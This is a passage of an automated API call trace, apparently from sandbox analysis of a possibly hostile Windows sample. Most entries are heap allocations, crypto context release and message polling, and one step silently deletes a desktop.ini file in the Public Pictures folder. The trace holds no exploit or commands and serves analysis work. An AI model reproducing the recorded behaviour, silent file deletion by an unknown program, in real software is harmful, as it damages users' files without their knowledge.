Flags=0x0, Size=0x20) returned 0x2e54238 [0269.257] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0269.257] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b50 [0269.257] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0269.257] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54260 [0269.257] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0269.257] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0269.257] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54260 | out: hHeap=0x970000) returned 1 [0269.257] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0269.257] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51a18 [0269.257] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0269.257] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0269.257] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0269.257] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0269.257] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0269.257] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0269.257] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0269.257] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0269.258] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0269.258] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a48 [0269.258] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0269.258] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0269.258] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0269.258] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0269.258] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0269.258] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0269.258] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0269.258] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51928 [0269.258] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0269.258] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51958 [0269.258] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0269.258] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0269.258] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a18 [0269.258] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51958 | out: hHeap=0x970000) returned 1 [0269.258] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0269.258] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0269.258] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0269.258] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b68 [0269.258] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0269.258] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a78 [0269.258] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0269.258] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0269.258] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51958 [0269.258] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0269.258] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0269.258] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51958 | out: hHeap=0x970000) returned 1 [0269.258] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0269.258] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0269.259] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51958 [0269.259] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0269.259] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0269.259] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b98 [0269.259] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51958 | out: hHeap=0x970000) returned 1 [0269.259] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0269.259] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b98 | out: hHeap=0x970000) returned 1 [0269.259] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0269.259] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b80 [0269.259] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0269.259] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0269.259] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69c08 [0269.259] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x2e69c08, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0269.259] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b80 | out: hHeap=0x970000) returned 1 [0269.259] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541c0 [0269.259] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c08 | out: hHeap=0x970000) returned 1 [0269.259] GetProcAddress (hModule=0x756e0000, lpProcName="CryptReleaseContext") returned 0x756ffbc0 [0269.259] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541c0 | out: hHeap=0x970000) returned 1 [0269.259] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0269.259] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a78 [0269.259] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0269.259] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0269.260] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0269.260] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0269.260] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0269.260] CryptReleaseContext (hProv=0xa5f958, dwFlags=0x0) returned 1 [0269.260] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f14d28 [0269.260] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51b80 [0269.260] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0269.260] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51958 [0269.260] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0269.260] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b98 [0269.260] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0269.260] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b98 | out: hHeap=0x970000) returned 1 [0269.260] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0269.260] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0269.260] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b98 [0269.260] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a78 [0269.260] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bb0 [0269.260] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0269.260] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bb0 | out: hHeap=0x970000) returned 1 [0269.260] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0269.260] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0269.260] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0269.260] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0269.260] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bb0 [0269.260] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0269.260] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bb0 | out: hHeap=0x970000) returned 1 [0269.260] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0269.261] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0269.261] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0269.261] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0269.261] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b68 | out: hHeap=0x970000) returned 1 [0269.261] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0269.261] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0269.261] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51940 | out: hHeap=0x970000) returned 1 [0269.261] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0269.261] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0269.261] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 [0269.261] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0269.261] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518e0 | out: hHeap=0x970000) returned 1 [0269.261] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0269.261] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b50 | out: hHeap=0x970000) returned 1 [0269.261] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0269.261] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0269.261] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0269.261] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54238 | out: hHeap=0x970000) returned 1 [0269.261] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51958 | out: hHeap=0x970000) returned 1 [0269.261] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b98 | out: hHeap=0x970000) returned 1 [0269.261] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0269.261] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b80 | out: hHeap=0x970000) returned 1 [0269.261] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0269.261] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f14d28 | out: hHeap=0x970000) returned 1 [0269.261] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0269.261] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0269.261] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b20 [0269.261] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0269.262] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7e9b8 [0269.262] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0269.262] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0269.262] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7e9b8 | out: hHeap=0x970000) returned 1 [0269.262] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0269.262] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51a00 [0269.262] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0269.262] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0269.262] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0269.262] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0269.262] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0269.262] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0269.262] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0269.262] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0269.262] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0269.262] FreeLibrary (hLibModule=0x756e0000) returned 1 [0269.262] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0269.262] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0269.262] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0269.262] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77688 | out: hHeap=0x970000) returned 1 [0269.262] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0269.262] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0269.262] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0269.262] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0269.262] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0269.262] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0269.262] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0269.262] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a28 [0269.262] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0269.262] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a28 | out: hHeap=0x970000) returned 1 [0269.263] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0269.263] CloseHandle (hObject=0x2d0) returned 1 [0269.264] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0269.264] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0269.264] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0269.264] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0269.264] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69c28 [0269.264] CloseHandle (hObject=0x2a0) returned 1 [0269.265] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0269.265] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bf8 [0269.265] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b50 [0269.265] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519a0 [0269.265] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0269.266] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0269.266] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51790 [0269.266] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51718 [0269.266] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0269.266] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51748 [0269.266] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54be8 [0269.266] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a68 [0269.266] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51760 [0269.266] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c88 [0269.266] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0269.266] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures/desktop.ini", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\Public\\Pictures\\desktop.ini", lpFilePart=0x8cedf4*="desktop.ini") returned 0x24 [0269.266] GetFileAttributesW (lpFileName="C:\\Users\\Public\\Pictures\\desktop.ini" (normalized: "c:\\users\\public\\pictures\\desktop.ini")) returned 0x26 [0269.266] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Pictures\\desktop.ini", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x1aa2f0c2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xc5fdc52c, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0xc5fdc52c, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x17c, dwReserved0=0x1, dwReserved1=0x1c, cFileName="desktop.ini", cAlternateFileName="")) returned 0xa87490 [0269.266] DeleteFileW (lpFileName="C:\\Users\\Public\\Pictures\\desktop.ini" (normalized: "c:\\users\\public\\pictures\\desktop.ini")) returned 1 [0269.267] FindNextFileW (in: hFindFile=0xa87490, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x1aa2f0c2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xc5fdc52c, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0xc5fdc52c, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x17c, dwReserved0=0x1, dwReserved1=0x1c, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0269.268] FindClose (in: hFindFile=0xa87490 | out: hFindFile=0xa87490) returned 1 [0269.268] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e58910 | out: hHeap=0x970000) returned 1 [0269.268] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0269.268] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51748 | out: hHeap=0x970000) returned 1 [0269.268] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51718 | out: hHeap=0x970000) returned 1 [0269.268] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51790 | out: hHeap=0x970000) returned 1 [0269.268] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0269.268] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51688 [0269.268] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516d0 [0269.268] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0269.268] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51820 [0269.268] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0269.268] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0269.268] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516a0 [0269.268] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0269.268] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0269.268] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516a0 | out: hHeap=0x970000) returned 1 [0269.268] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0269.268] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0269.268] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516e8 [0269.268] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xa0) returned 0x2e58910 [0269.268] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0269.268] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516e8 | out: hHeap=0x970000) returned 1 [0269.268] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0269.268] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0269.268] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0269.268] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516b8 [0269.269] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0269.269] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0269.269] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4a) returned 0x2e54858 [0269.269] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures/desktop.ini", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\Public\\Pictures\\desktop.ini", lpFilePart=0x8cf650*="desktop.ini") returned 0x24 [0269.269] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54858 | out: hHeap=0x970000) returned 1 [0269.269] GetFileAttributesW (lpFileName="C:\\Users\\Public\\Pictures\\desktop.ini" (normalized: "c:\\users\\public\\pictures\\desktop.ini")) returned 0xffffffff [0269.269] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e58910 | out: hHeap=0x970000) returned 1 [0269.269] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0269.269] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51820 | out: hHeap=0x970000) returned 1 [0269.269] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0269.269] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516b8 | out: hHeap=0x970000) returned 1 [0269.269] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51688 | out: hHeap=0x970000) returned 1 [0269.269] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0269.269] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0269.269] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0269.269] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77588 | out: hHeap=0x970000) returned 1 [0269.269] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: 